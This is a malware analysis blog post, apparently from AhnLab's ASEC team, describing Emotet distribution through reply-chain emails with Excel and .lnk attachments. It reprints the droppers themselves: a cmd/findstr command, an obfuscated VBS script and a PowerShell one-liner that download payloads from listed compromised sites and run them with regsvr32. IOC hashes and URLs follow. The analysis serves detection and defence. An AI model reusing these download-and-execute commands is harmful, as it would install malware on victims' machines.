Emotet Being Distributed Using Various Files

The ASEC analysis team has recently discovered the distribution of Emotet through link files (.lnk). The malware has been steadily distributed in the past, but starting from April, it was found that the Emotet downloader uses Excel files as well as link files (.lnk).

One feature that the secured EML files share is that they all disguise themselves as replies to the user’s email to distribute the malware strain.

Figure 1. Distributed email 1

Figure 2. Distributed email 2

Figure 3. Distributed email 3

The Excel file attached in the email of Figure 1 uses the same method of utilizing the macro sheet as explained in the posts below.

Figure 4. Excel file

Figure 5. Formulas in the Excel file

Below is the list of download URLs.

  • hxxp://easiercommunications[.]com/wp-content/w/
  • hxxp://dulichdichvu[.]net/libraries/QhtrjCZymLp5EbqOdpKk/)
  • hxxps://www.whow[.]fr/wp-includes/H54Fgj0tG/)
  • hxxp://genccagdas[.]com.tr/assets/TTHOm833iNn3BxT/)
  • hxxp://heaventechnologies[.]com.pk/apitest/xdeAU0rx26LT9I/)
  • hxxp://goonboy[.]com/goonie/bSFz7Av/

There were also multiple lnk files besides Excel files, mostly distributed with the names related to invoices. The commands executed differ depending on the distribution date.

Confirmed DateFilename used in distribution
April 26thEXT Payment status.lnk
April 26thPast Due invoice.lnk
April 28thElectronic form.lnk
April 28thdetalles_28042022.lnk
April 29thAddress Changed.lnk
April 29thChange of Address.lnk
May 2ndPayment with a new address.lnk
May 3rdINF_15823367.lnk
May 3rdMES_11845137690439733.lnk
Table 1. Confirmed lnk filenames

  • Invoice # US-616121772.lnk

‘Invoice # US-616121772.lnk’ attached to the email from Figure 2 runs the following command upon being executed.

cmd.exe /v:on /c findstr “glKmfOKnQLYKnNs.*” “Invoice # US-616121772.lnk”  > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”

The bottom part of the file has a script code starting with the string ‘glKmfOKnQLYKnNs’. When the file is run, the code is saved as a file ‘YlScZcZKeP.vbs’ in the %TEMP% folder and executed.

Figure 6. Script at the bottom part of the lnk file

Inside YlScZcZKeP.vbs are URLs encoded with Base64. The file will access the URLs to download and run additional malware strains.

glKmfOKnQLYKnNs=1::on error resume next:Set FSO = CreateObject(“Scripting.FileSystemObject”)::Function Base64Decode(ByVal vCode):    With CreateObject(“Msxml2.DOMDocument.3.0”).CreateElement(“base64”):        .dataType = “bin.base64”:        .text = vCode:        Base64Decode = Stream_BinaryToString(.nodeTypedValue):    End With:End Function::Function Stream_BinaryToString(Binary):    With CreateObject(“ADODB.Stream”):        .Type = 1:        .Open:        .Write Binary:        .Position = 0:        .Type = 2:        .CharSet = “utf-8”:        Stream_BinaryToString = .ReadText:    End With:End Function::Dim LmPxinnpsd(6):::LmPxinnpsd(0) = “aHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2Iv”::LmPxinnpsd(1) = “aHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIv”::LmPxinnpsd(2) = “aHR0cDovL2RlbW8zNC5ja2cuaGsvc2VydmljZS9oaE1acmZDN01ubTlKRC8=”::LmPxinnpsd(3) = “aHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2Lw==”::LmPxinnpsd(4) = “aHR0cDovL2NpcHJvLm14L3ByZW5zYS9zaVpQNjlyQkZtaWJEdnVUUDFMLw==”::LmPxinnpsd(5) = “aHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8=”:::Execute(“dIm xml,Ws”&chr(-7328+7372)&”Db,FiLePaTH,u”&chr(6281-6199)&”L:”&chr(872280/7269)&”ml = “”MSXml2.SeRVERXmlht”&chr(-4790+4874)&”p.3″&chr(7943-7897)&”0″”:Ws = “”wscRipT.SHEll””:D”&chr(3908-3810)&” = “”aDo”&chr(-4831+4931)&”b.”&chr(7496-7413)&”TReam””:seT ImSHdnYd”&chr(-9735+9821)&”R =”&chr(-6409+6441)
<omitted>
Part of VBS code

Below is the list of download URLs.

  • hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/
  • hxxp://filmmogzivota[.]rs/SpryAssets/gDR/
  • hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/
  • hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/
  • hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1L/
  • hxxp://colegiounamuno[.]es/cgi-bin/E/

The downloaded file is saved as a file named ‘KzcEXkekpr.Zvp’ in the %TEMP% folder and executed through the command ‘%wInDiR% \sySTem32\regsVR32.Exe %tmp% \KZcEXkEkpR.ZVP’.

  • 20220429_57092_005.lnk

The file ‘20220429_57092_005.lnk’ attached in the email from Figure 3 uses powershell commands to download an additional file unlike the lnk file explained above. When the lnk file is run, it uses the powershell command shown below to decode the Base64-encoded data and save it as a file named ‘xLhSBgzPSx.ps1’ in the %TEMP% folder.

C:\Windows\system32\cmd.exe /v:on /c fHjk4fTLlkc5DZfyorHstui9FxCd6xw3JieZWhdwrpiX+F4gEcRJCp5i1KXfjUxLJXU8QzW5||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c “&{[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(‘JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDo<omitted>’)) > “%tmp%\xLhSBgzPSx.ps1”; powershell -executionpolicy bypass -file “$env:TEMP\xLhSBgzPSx.ps1”; Remove-Item -Force “$env:TEMP\xLhSBgzPSx.ps1″}”
Part of execution commands

$ProgressPreference="SilentlyContinue";$links=("hxxp://gccon.in/UploadedFiles/UYtJNrT2llxy1/","hxxp://gakudou.com/photo06/hEu/","hxxp://giasotti.com/js/Khc6mb0zx4KoWX/","hxxp://plresende.com/pcinfor/cq/","hxxp://thomasmanton.com/wp-includes/owZnpWmH4D8j/","hxxp://gla.ge/old/PuVaff/");foreach ($u in $links) {try {IWR $u -OutFile $env:TEMP/jnURxtRmiO.SKh;Regsvr32.exe $env:TEMP/jnURxtRmiO.SKh;break} catch { }}

Below is the list of download URLs.

  • hxxp://gccon[.]in/UploadedFiles/UYtJNrT2llxy1/
  • hxxp://gakudou[.]com/photo06/hEu/
  • hxxp://giasotti[.]com/js/Khc6mb0zx4KoWX/
  • hxxp://plresende[.]com/pcinfor/cq/
  • hxxp://thomasmanton[.]com/wp-includes/owZnpWmH4D8j/
  • hxxp://gla[.]ge/old/PuVaff/

The downloaded file is saved in the %TEMP% folder as ‘jnURxtRmiO.SKh’ and executed through the command ‘Regsvr32.exe $env:TEMP/jnURxtRmiO.SKh’.

It appears Emotet is downloaded from the download URLs mentioned earlier. Emotet attempts to access multiple C&C server URLs existing inside the malware when it is run. If the access is successful, it can receive commands from the attacker to perform malicious behaviors such as downloading additional malware strains.

As the malware is distributed through various downloaders besides Excel, users need to take caution.

AhnLab’s anti-malware software, V3, is currently detecting and blocking the files using the following aliases.

[File Detection]
Downloader/XLS.Emotet
LNK/Autorun.Gen
Trojan/LNK.Runner
Trojan/Win.Agent.R488899

[IOC]
c32c22fa90ad51747e9939f8e7abf4c0
fd37d5fecf99b16df331be14649ac09c
6e1da3039639bb9d40fc9d5d355062c2
c43d185691aaba7d1d196156a4a450f7
hxxp://easiercommunications[.]com/wp-content/w/
hxxp://dulichdichvu[.]net/libraries/QhtrjCZymLp5EbqOdpKk/)
hxxps://www.whow[.]fr/wp-includes/H54Fgj0tG/)
hxxp://genccagdas[.]com.tr/assets/TTHOm833iNn3BxT/)
hxxp://heaventechnologies[.]com.pk/apitest/xdeAU0rx26LT9I/)
hxxp://goonboy[.]com/goonie/bSFz7Av/
hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/
hxxp://filmmogzivota[.]rs/SpryAssets/gDR/
hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/
hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/
hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1L/
hxxp://colegiounamuno[.]es/cgi-bin/E/
hxxp://gccon[.]in/UploadedFiles/UYtJNrT2llxy1/
hxxp://gakudou[.]com/photo06/hEu/
hxxp://giasotti[.]com/js/Khc6mb0zx4KoWX/
hxxp://plresende[.]com/pcinfor/cq/
hxxp://thomasmanton[.]com/wp-includes/owZnpWmH4D8j/
hxxp://gla[.]ge/old/PuVaff/

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:,

0 0 votes
Article Rating
guest
1 Comment
Inline Feedbacks
View all comments
trackback

[…] Source link […]